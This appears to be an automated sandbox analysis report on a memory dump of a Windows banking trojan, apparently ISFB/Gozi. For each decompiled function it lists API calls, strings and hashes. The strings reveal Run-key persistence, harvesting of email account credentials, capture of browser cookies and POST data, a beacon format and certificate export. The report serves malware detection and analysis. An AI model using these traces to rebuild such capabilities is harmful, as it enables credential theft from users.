APIs

Part of subcall function 009C39D7: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 009C3A0B
Part of subcall function 009C39D7: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 009C3ACC
Part of subcall function 009C39D7: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 009C3AD5

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 009B1F28

Part of subcall function 009B3828: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 009B3842
Part of subcall function 009B3828: CreateWaitableTimerA.KERNEL32(009DE0D4,00000003,?), ref: 009B385F
Part of subcall function 009B3828: GetLastError.KERNEL32(?,?,009C3A3F,?,?,?,00000000,?,?,?), ref: 009B3870
Part of subcall function 009B3828: GetSystemTimeAsFileTime.KERNEL32(?,00000000,009C3A3F,?,?,?,009C3A3F,?), ref: 009B38B0
Part of subcall function 009B3828: SetWaitableTimer.KERNEL32(00000000,009C3A3F,00000000,00000000,00000000,00000000,?,?,009C3A3F,?), ref: 009B38CF
Part of subcall function 009B3828: HeapFree.KERNEL32(00000000,009C3A3F,00000000,009C3A3F,?,?,?,009C3A3F,?), ref: 009B38E5

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 009B1F8B
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 009B200B
WaitForMultipleObjects.KERNEL32(00008005,?,00000000,000000FF), ref: 009B20B0

Part of subcall function 009C08B3: RtlAllocateHeap.NTDLL(00000000,00000010,747DF730), ref: 009C08D5
Part of subcall function 009C08B3: HeapFree.KERNEL32(00000000,00000000,00000129,00000000,00000000,?,?,?,?,009B1F61,?), ref: 009C0906

WaitForSingleObject.KERNEL32(?,00000000,?), ref: 009B20E5
WaitForSingleObject.KERNEL32(?,00000000), ref: 009B20F4
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 009B2121
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 009B213B
_allmul.NTDLL(00000258,00000000,FF676980,000000FF), ref: 009B2183
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000258,00000000,FF676980,000000FF,00000000), ref: 009B219D
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 009B21B3
ReleaseMutex.KERNEL32(?), ref: 009B21D0
WaitForSingleObject.KERNEL32(?,00000000), ref: 009B21E1
WaitForSingleObject.KERNEL32(?,00000000), ref: 009B21F0
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 009B2224
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 009B223E
SwitchToThread.KERNEL32 ref: 009B2240
ReleaseMutex.KERNEL32(?), ref: 009B224A
WaitForSingleObject.KERNEL32(?,00000000), ref: 009B2288

Part of subcall function 009BAC31: RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 009BAC4F
Part of subcall function 009BAC31: RegQueryValueExA.ADVAPI32(?,Main,00000000,747DF710,00000000,?,747DF710,00000000), ref: 009BAC74
Part of subcall function 009BAC31: RtlAllocateHeap.NTDLL(00000000,?), ref: 009BAC85
Part of subcall function 009BAC31: RegQueryValueExA.ADVAPI32(?,Main,00000000,00000000,00000000,?), ref: 009BACA0
Part of subcall function 009BAC31: HeapFree.KERNEL32(00000000,?), ref: 009BACBE
Part of subcall function 009BAC31: RegCloseKey.ADVAPI32(?), ref: 009BACC7

WaitForSingleObject.KERNEL32(?,00000000), ref: 009B2293
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 009B22B6
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 009B22D0
SwitchToThread.KERNEL32 ref: 009B22D2
ReleaseMutex.KERNEL32(?), ref: 009B22DC
WaitForSingleObject.KERNEL32(?,00000000), ref: 009B22F1
CloseHandle.KERNEL32(?), ref: 009B233F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 009B2353
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 009B235F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 009B236B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 009B2377
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 009B2383
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 009B238F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 009B239B
RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 009B23AA

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Wait$Close$Handle$ObjectSingleTimerWaitable$HeapMultipleObjects$MutexRelease_allmul$FreeThread$AllocateCreateErrorLastOpenQuerySwitchTimeValue$EventExitFileSystemUser
String ID:
API String ID: 3804754466-0
Opcode ID: ad1b897cb8694f77391f6069e7c951865d09775f70e41e29d7c19df76b24c4fe
Instruction ID: 00dec537d4b3f5d1eba9ad22e95399d49ffe8f75652ba4d1b37d84c9d7ba9ba0
Opcode Fuzzy Hash: ad1b897cb8694f77391f6069e7c951865d09775f70e41e29d7c19df76b24c4fe
Instruction Fuzzy Hash: 77E1917145D305AFDB11AF68CD809ABBBEDFB84364F004A2EF5A4921A0D770CC85DB52

Uniqueness

Uniqueness Score: -1.00%

Function 009D0228, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 378memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(,00000000,?,?), ref: 009D0280
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 009D031A
lstrcpyn.KERNEL32(00000000,?,?), ref: 009D032F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 009D034B
StrChrA.SHLWAPI(?,00000020,?,?), ref: 009D0426
StrChrA.SHLWAPI(00000001,00000020), ref: 009D0437
lstrlen.KERNEL32(00000000), ref: 009D044B
memmove.NTDLL(?,?,00000001), ref: 009D045B
lstrlen.KERNEL32(?,?,?), ref: 009D047E
RtlAllocateHeap.NTDLL(00000000,?), ref: 009D04A4
memcpy.NTDLL(00000000,?,?), ref: 009D04B8
memcpy.NTDLL(?,?,?), ref: 009D04D8
HeapFree.KERNEL32(00000000,?), ref: 009D0514
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 009D05DA
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 009D0622

Strings

Content-Type:, xrefs: 009D0386
PUT , xrefs: 009D0254
GET , xrefs: 009D0413
Accept-Encoding:, xrefs: 009D046B
POST, xrefs: 009D025B
ocsp, xrefs: 009D0393
gzip, deflate, xrefs: 009D0466
, xrefs: 009D027B, 009D02AC
User-Agent:, xrefs: 009D02F9
OPTI, xrefs: 009D0262
OPTI, xrefs: 009D041B
GET , xrefs: 009D024D

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
String ID: $ gzip, deflate$Accept-Encoding:$Content-Type:$GET $GET $OPTI$OPTI$POST$PUT $User-Agent:$ocsp
API String ID: 3227826163-537135598
Opcode ID: d5c0302ecbd42e21772c6f6c64573221c5144b947aa15f97069ba781f47ee319
Instruction ID: 707f6f35f18e0a282b6c242dab1772453a95660a3bccc9b7f76312d33c239534
Opcode Fuzzy Hash: d5c0302ecbd42e21772c6f6c64573221c5144b947aa15f97069ba781f47ee319
Instruction Fuzzy Hash: 07D15A35A81205AFDB10DFA8CC85BAEBBB9FF84300F14855AF915AB261DB30ED50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009B53D6, Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 284memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 009B540E
wsprintfA.USER32 ref: 009B5471
wsprintfA.USER32 ref: 009B54BA
wsprintfA.USER32 ref: 009B54DE
lstrcat.KERNEL32(?,726F7426), ref: 009B5518
wsprintfA.USER32 ref: 009B5537
wsprintfA.USER32 ref: 009B5550
wsprintfA.USER32 ref: 009B5574
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 009B5591
RtlEnterCriticalSection.NTDLL(06288D20), ref: 009B55B2
RtlLeaveCriticalSection.NTDLL(06288D20), ref: 009B55D2

Part of subcall function 009CA378: lstrlen.KERNEL32(00000000,00000000,747C81D0,00000000,?,?,009D4BA0,00000000,06288D60), ref: 009CA3A3
Part of subcall function 009CA378: lstrlen.KERNEL32(?,?,?,009D4BA0,00000000,06288D60), ref: 009CA3AB
Part of subcall function 009CA378: strcpy.NTDLL ref: 009CA3C2
Part of subcall function 009CA378: lstrcat.KERNEL32(00000000,?), ref: 009CA3CD
Part of subcall function 009CA378: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,009D4BA0,00000000,06288D60), ref: 009CA3EA

StrTrimA.SHLWAPI(00000000,009D83E4,?,06288D60), ref: 009B5606

Part of subcall function 009CA587: lstrlen.KERNEL32(?,00000000,747C81D0,009D4BD7,612E002F,00000000), ref: 009CA593
Part of subcall function 009CA587: lstrlen.KERNEL32(?), ref: 009CA59B
Part of subcall function 009CA587: lstrcpy.KERNEL32(00000000,?), ref: 009CA5B2
Part of subcall function 009CA587: lstrcat.KERNEL32(00000000,?), ref: 009CA5BD

lstrcpy.KERNEL32(?,00000000), ref: 009B5635
lstrcat.KERNEL32(?,?), ref: 009B5643
lstrcat.KERNEL32(?,?), ref: 009B564D
RtlEnterCriticalSection.NTDLL(06288D20), ref: 009B5658
RtlLeaveCriticalSection.NTDLL(06288D20), ref: 009B5674

Part of subcall function 009BF02B: memset.NTDLL ref: 009BF064
Part of subcall function 009BF02B: memcpy.NTDLL(?,?,00000090,00000000,00000000,0000009F,0000009F,?,00000090,?), ref: 009BF070

HeapFree.KERNEL32(00000000,?,?,?,?,06288D60,00000001), ref: 009B573A
HeapFree.KERNEL32(00000000,?,009E044E,?), ref: 009B574C
HeapFree.KERNEL32(00000000,?,?,06288D60), ref: 009B575E
HeapFree.KERNEL32(00000000,00000000), ref: 009B5770
HeapFree.KERNEL32(00000000,?), ref: 009B5782

Strings

version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s, xrefs: 009B546B
EMPTY, xrefs: 009B53E0

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpy$memcpymemsetstrcpy
String ID: EMPTY$version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
API String ID: 1483892062-304588751
Opcode ID: bced3f2480826fe26fe697754febfeaa4de8e6f65e76e2aeecb90968be282971
Instruction ID: d380f9ec9473a18afe662661e26abbbb731ed17105cfaf469f785774386f98c6
Opcode Fuzzy Hash: bced3f2480826fe26fe697754febfeaa4de8e6f65e76e2aeecb90968be282971
Instruction Fuzzy Hash: FFB19B7169A201EFDB01DF68DD84F9A7BE9FB88314F04482AF148D7271D630E985EB52

Uniqueness

Uniqueness Score: -1.00%

Function 009D4970, Relevance: 39.3, APIs: 26, Instructions: 260memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 009D4991
GetTickCount.KERNEL32 ref: 009D49AB
wsprintfA.USER32 ref: 009D49FE
QueryPerformanceFrequency.KERNEL32(?), ref: 009D4A0A
QueryPerformanceCounter.KERNEL32(?), ref: 009D4A15
_aulldiv.NTDLL(?,?,?,?), ref: 009D4A2B
wsprintfA.USER32 ref: 009D4A41
wsprintfA.USER32 ref: 009D4A5F
wsprintfA.USER32 ref: 009D4A76
wsprintfA.USER32 ref: 009D4A97
wsprintfA.USER32 ref: 009D4AD2
wsprintfA.USER32 ref: 009D4AF6
lstrcat.KERNEL32(?,726F7426), ref: 009D4B2E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 009D4B48
GetTickCount.KERNEL32 ref: 009D4B58
RtlEnterCriticalSection.NTDLL(06288D20), ref: 009D4B6C
RtlLeaveCriticalSection.NTDLL(06288D20), ref: 009D4B8A
StrTrimA.SHLWAPI(00000000,009D83E4,00000000,06288D60), ref: 009D4BBF
lstrcpy.KERNEL32(00000000,00000000), ref: 009D4BEB
lstrcat.KERNEL32(00000000,?), ref: 009D4BF6
lstrcat.KERNEL32(00000000,00000000), ref: 009D4BFA
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 009D4C7B
HeapFree.KERNEL32(00000000,00000000,612E002F,00000000), ref: 009D4C8A
HeapFree.KERNEL32(00000000,00000000,00000000,06288D60), ref: 009D4C99
HeapFree.KERNEL32(00000000,00000000), ref: 009D4CAB
HeapFree.KERNEL32(00000000,?), ref: 009D4CBD

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
String ID:
API String ID: 2878544442-0
Opcode ID: c06fc243a9d0fa56e0b96171bca4c2da8c611b30a57f9be1e5c2f78e74e5ac06
Instruction ID: 2d9d61fe9d8e60efb5a9c1d238114d79af89fd591d5c723430e77067adfae10e
Opcode Fuzzy Hash: c06fc243a9d0fa56e0b96171bca4c2da8c611b30a57f9be1e5c2f78e74e5ac06
Instruction Fuzzy Hash: 33A15B7159A205AFDB01DFA8EC84F9A3BE8BB48704F044427F548D7261DB70D895EB62

Uniqueness

Uniqueness Score: -1.00%

Function 009BCE48, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 009C672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,009B1CDF,00000000,00000000,?,?,00000000,?,?,?,009B1CDF,TorClient), ref: 009C6765
Part of subcall function 009C672D: RtlAllocateHeap.NTDLL(00000000,009B1CDF), ref: 009C6779
Part of subcall function 009C672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,009B1CDF,?,?,?,009B1CDF,TorClient,?,?), ref: 009C6793
Part of subcall function 009C672D: RegCloseKey.KERNELBASE(?,?,?,?,009B1CDF,TorClient,?,?), ref: 009C67BD

HeapFree.KERNEL32(00000000,?,LastTask,?,?,747DF710,00000000,00000000), ref: 009BCE88
RtlAllocateHeap.NTDLL(00000000,00010000,LastTask), ref: 009BCEA6
HeapFree.KERNEL32(00000000,00000000,0000011A,00000000,00000000,?,?,?,?,?,?,009B2255), ref: 009BCED7
HeapFree.KERNEL32(00000000,009D83E4,0000011B,00000000,00000000,00000000,00000000,?,00000001,009D83E4,00000002,?,?), ref: 009BCF4E
RtlAllocateHeap.NTDLL(00000000,00000400,LastTask), ref: 009BD013
wsprintfA.USER32 ref: 009BD027
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,009B2255), ref: 009BD032
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000,?,?,?,?,?,?,?,?,?,009B2255), ref: 009BD04C
HeapFree.KERNEL32(00000000,?,LastTask,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000001,009D83E4,00000002,?), ref: 009BD06E
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 009BD089
wsprintfA.USER32 ref: 009BD099
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,009B2255), ref: 009BD0A4

Part of subcall function 009B94B4: lstrlen.KERNEL32(?,00000000,00000000,74785520,?,?,?,009B1647,0000010D,00000000,00000000), ref: 009B94E4
Part of subcall function 009B94B4: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 009B94FA
Part of subcall function 009B94B4: memcpy.NTDLL(00000010,?,00000000,?,?,?,009B1647,0000010D), ref: 009B9530
Part of subcall function 009B94B4: memcpy.NTDLL(00000010,00000000,009B1647,?,?,?,009B1647), ref: 009B954B
Part of subcall function 009B94B4: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 009B9569
Part of subcall function 009B94B4: GetLastError.KERNEL32(?,?,?,009B1647), ref: 009B9573
Part of subcall function 009B94B4: HeapFree.KERNEL32(00000000,00000000,?,?,?,009B1647), ref: 009B9599

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000,?,?,?,?,?,?,?,?,?,009B2255), ref: 009BD0BE
HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000001,009D83E4,00000002,?,?), ref: 009BD0CE

Strings

LastTask, xrefs: 009BCE5B, 009BCF8F
Cmd %u parsing: %u, xrefs: 009BD093
Cmd %s processed: %u, xrefs: 009BD021

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
String ID: Cmd %s processed: %u$Cmd %u parsing: %u$LastTask
API String ID: 3733591251-3332907627
Opcode ID: b6ed3544beb4f2f3eb5458f95c775aaaea65f1036c9d738fd6ea6b73e09728da
Instruction ID: f4b953c44cbb081d547e35f67ce976b360792382052fd2bb5e4b48e89ab373f6
Opcode Fuzzy Hash: b6ed3544beb4f2f3eb5458f95c775aaaea65f1036c9d738fd6ea6b73e09728da
Instruction Fuzzy Hash: 8971ABB1956108FFDB20AFA4DD88EEFBB7DFB48354B00486AF605A2261D7304D81DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009CBBD2, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 129memoryregistrythreadCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 009CBBED
RtlEnterCriticalSection.NTDLL(00000000), ref: 009CBC0A
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 009CBC5A
DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 009CBC64
GetLastError.KERNEL32 ref: 009CBC6E
HeapFree.KERNEL32(00000000,00000000), ref: 009CBC7F
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 009CBCA1
HeapFree.KERNEL32(00000000,?), ref: 009CBCD8
RtlLeaveCriticalSection.NTDLL(00000000), ref: 009CBCEC
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 009CBCF5
SuspendThread.KERNEL32(?), ref: 009CBD04
CreateEventA.KERNEL32(009DE0D4,00000001,00000000), ref: 009CBD18
SetEvent.KERNEL32(00000000), ref: 009CBD25
CloseHandle.KERNEL32(00000000), ref: 009CBD2C
Sleep.KERNEL32(000001F4), ref: 009CBD3F
ResumeThread.KERNEL32(?), ref: 009CBD63

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 009CBBDE

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1011176505-1428018034
Opcode ID: 9fc0127d64927aaa25c5d77c0d4feec7c2e040c240a9e243900ae9105a409391
Instruction ID: 1d08cda3d543454d4744b0fb38249d035e83011ae8347105431e71ea0fc193a3
Opcode Fuzzy Hash: 9fc0127d64927aaa25c5d77c0d4feec7c2e040c240a9e243900ae9105a409391
Instruction Fuzzy Hash: 8B418072996109EFCB10AF98DC89EAEBB79FB14304F10446AF502A2161CB315DD5EB51

Uniqueness

Uniqueness Score: -1.00%

Function 009C1D51, Relevance: 29.8, APIs: 9, Strings: 8, Instructions: 85librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WININET.DLL,?,00000000,00000000,?,?), ref: 009C1D6A
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009D17C0), ref: 009C1D74
LoadLibraryA.KERNEL32(ieframe), ref: 009C1D96
LoadLibraryA.KERNEL32(ieui), ref: 009C1D9D
LoadLibraryA.KERNEL32(mshtml), ref: 009C1DA4
LoadLibraryA.KERNEL32(inetcpl.cpl), ref: 009C1DAB
LoadLibraryA.KERNEL32(ieapfltr), ref: 009C1DB2
LoadLibraryA.KERNEL32(urlmon), ref: 009C1DB9
HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,WININET.dll), ref: 009C1E41

Strings

inetcpl.cpl, xrefs: 009C1DA6
WININET.DLL, xrefs: 009C1D62
mshtml, xrefs: 009C1D9F
ieframe, xrefs: 009C1D91
ieapfltr, xrefs: 009C1DAD
WININET.dll, xrefs: 009C1DBB
urlmon, xrefs: 009C1DB4
ieui, xrefs: 009C1D98

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad$AllocFreeHeap
String ID: WININET.DLL$WININET.dll$ieapfltr$ieframe$ieui$inetcpl.cpl$mshtml$urlmon
API String ID: 356845663-1120705325
Opcode ID: a675b9fc1be32cbc45dade3a38883b81c7878f9d4cdee2f05ff47a41510fb0ef
Instruction ID: e72a6d30e1f2d9e54740af711decfc4aa470f0f7ca7e081a669d2ce540c2b498
Opcode Fuzzy Hash: a675b9fc1be32cbc45dade3a38883b81c7878f9d4cdee2f05ff47a41510fb0ef
Instruction Fuzzy Hash: 2F21E970E85204FBDB20AFE5CC82F9E7F68EB44750F50806BE506E7292C7705984DB66

Uniqueness

Uniqueness Score: -1.00%

Function 009C8601, Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 172stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,009E0468,Port,?,009E0468,Secure_Connection,?,009E0468,User_Name,?,009E0468,Server,00000000,00000000,00000000), ref: 009C86D9
lstrcpyW.KERNEL32(00000000,009E0724), ref: 009C86F1
lstrcatW.KERNEL32(00000000,00000000), ref: 009C86F9
lstrlenW.KERNEL32(00000000,?,009E0468,Password2,?,009E0468,Port,?,009E0468,Secure_Connection,?,009E0468,User_Name,?,009E0468,Server), ref: 009C873E
memcpy.NTDLL(00000000,?,?,?), ref: 009C8797
LocalFree.KERNEL32(?,?), ref: 009C87AE

Strings

Password2, xrefs: 009C8723
POP3, xrefs: 009C8656
Port, xrefs: 009C86BD
P, xrefs: 009C866D
SMTP, xrefs: 009C8646
IMAP, xrefs: 009C8676
User_Name, xrefs: 009C86A2
Server, xrefs: 009C868B
HTTPMail, xrefs: 009C8666
Secure_Connection, xrefs: 009C86AE

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: HTTPMail$IMAP$P$POP3$Password2$Port$SMTP$Secure_Connection$Server$User_Name
API String ID: 3649579052-2088458108
Opcode ID: fd664b3211fe893580d3091bbe654557b5d5579463520fa3d2840dce45329143
Instruction ID: 5b850c71b2cb562c3c4b9a82c4f16b8a06d43a51141b8450d233acf0cec5b5d6
Opcode Fuzzy Hash: fd664b3211fe893580d3091bbe654557b5d5579463520fa3d2840dce45329143
Instruction Fuzzy Hash: A951A471D00249ABCF219FA5CD45EEF7BBDEF84304F14441AF510B2191EBB58951CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009B5223, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 156memorystringfileCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 009B523A
lstrlen.KERNEL32(?), ref: 009B5241
RtlAllocateHeap.NTDLL(00000000,?), ref: 009B5258
lstrcpy.KERNEL32(00000000,?), ref: 009B5269
lstrcat.KERNEL32(?,?), ref: 009B5285
lstrcat.KERNEL32(?,.pfx), ref: 009B528F
RtlAllocateHeap.NTDLL(00000000,?), ref: 009B52A0
RtlAllocateHeap.NTDLL(00000000,?), ref: 009B5338
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 009B5368
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 009B5381
CloseHandle.KERNEL32(00000000), ref: 009B538B
HeapFree.KERNEL32(00000000,?), ref: 009B539B
HeapFree.KERNEL32(00000000,00000000), ref: 009B53B6
HeapFree.KERNEL32(00000000,?), ref: 009B53C6

Strings

ISFB, xrefs: 009B531B, 009B5320, 009B5348
.pfx, xrefs: 009B5287

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
String ID: .pfx$ISFB
API String ID: 333890978-2368466137
Opcode ID: 3f6bf61acff928e629bc4d59a0edbd828b7003ca53d86a525c4b95ad6fe1b075
Instruction ID: 116f1a8a229f972d82c636d3d0b4bc8b039b60cf8944f7acb81d5b6347b06968
Opcode Fuzzy Hash: 3f6bf61acff928e629bc4d59a0edbd828b7003ca53d86a525c4b95ad6fe1b075
Instruction Fuzzy Hash: A8516EB1455119FFCB11AFA4DC84DEE7BBDFB04394B164466F505A3160C7318E85EB60

Uniqueness

Uniqueness Score: -1.00%

Function 009D0669, Relevance: 27.3, APIs: 3, Strings: 15, Instructions: 262memorystringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,00000000,?,00000000,009C279E,?,00000000), ref: 009D0718
HeapFree.KERNEL32(00000000,00000008,?,?), ref: 009D08D1
lstrlen.KERNEL32(00000008,00000000), ref: 009D0923

Strings

Content-Security-Policy-Report-Only:, xrefs: 009D0860
X-Frame-Options, xrefs: 009D086C
chunked, xrefs: 009D08F7
Content-Encoding:, xrefs: 009D07A8, 009D0801
Last-Modified:, xrefs: 009D083C
no-cache, no-store, must-revalidate, xrefs: 009D0829
Content-Security-Policy:, xrefs: 009D0854
gzip, xrefs: 009D07BE
Access-Control-Allow-Origin:, xrefs: 009D0876, 009D087B, 009D088D
Cache-Control:, xrefs: 009D082E
Content-Type:, xrefs: 009D0753
Etag:, xrefs: 009D0848
Content-Length:, xrefs: 009D090A
Transfer-Encoding:, xrefs: 009D08FC
HTTP/1.1 404 Not Found, xrefs: 009D0710

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeaplstrlenmemcpy
String ID: chunked$Access-Control-Allow-Origin:$Cache-Control:$Content-Encoding:$Content-Length:$Content-Security-Policy-Report-Only:$Content-Security-Policy:$Content-Type:$Etag:$HTTP/1.1 404 Not Found$Last-Modified:$Transfer-Encoding:$X-Frame-Options$gzip$no-cache, no-store, must-revalidate
API String ID: 462153822-754885170
Opcode ID: 457401af52393cd5c59a07e84a9a20dab7bfa947bc9a084c2f3890ecbf0a20ff
Instruction ID: 03b01e375b75b8ee6f65239466a982724fc6534c1c9b14ad926e479550bb2392
Opcode Fuzzy Hash: 457401af52393cd5c59a07e84a9a20dab7bfa947bc9a084c2f3890ecbf0a20ff
Instruction Fuzzy Hash: AAA19171A802019FDB10DF65C996B9A3BA8BF84764F11816AFC49AF356D7B0EC50CF90

Uniqueness

Uniqueness Score: -1.00%

Function 009C5BE6, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 174stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(06289608,00000000,00000000,74785520,?), ref: 009C5C09
lstrlen.KERNEL32(?,00000000,00000000,74785520,?), ref: 009C5C18
lstrlen.KERNEL32(?,00000000,00000000,74785520,?), ref: 009C5C25
lstrlen.KERNEL32(00000000,00000000,00000000,74785520,?), ref: 009C5C3D
lstrlen.KERNEL32(?,00000000,00000000,74785520,?), ref: 009C5C49
RtlAllocateHeap.NTDLL(00000000,?), ref: 009C5C65
wsprintfA.USER32 ref: 009C5D1D
memcpy.NTDLL(00000000,00004000,?), ref: 009C5D62
InterlockedExchange.KERNEL32(009DE00C,00000000), ref: 009C5D80
HeapFree.KERNEL32(00000000,00000000), ref: 009C5DC3

Part of subcall function 009BAA89: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 009BAAB2
Part of subcall function 009BAA89: memcpy.NTDLL(00000000,?,?), ref: 009BAAC5
Part of subcall function 009BAA89: RtlEnterCriticalSection.NTDLL(009DE268), ref: 009BAAD6
Part of subcall function 009BAA89: RtlLeaveCriticalSection.NTDLL(009DE268), ref: 009BAAEB
Part of subcall function 009BAA89: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 009BAB23

Strings

Cookie: , xrefs: 009C5CB7
Accept-Language: , xrefs: 009C5C9D
USER: %s, xrefs: 009C5D17
URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: , xrefs: 009C5D48
Referer: , xrefs: 009C5C89

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID: Accept-Language: $Cookie: $Referer: $URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: $USER: %s
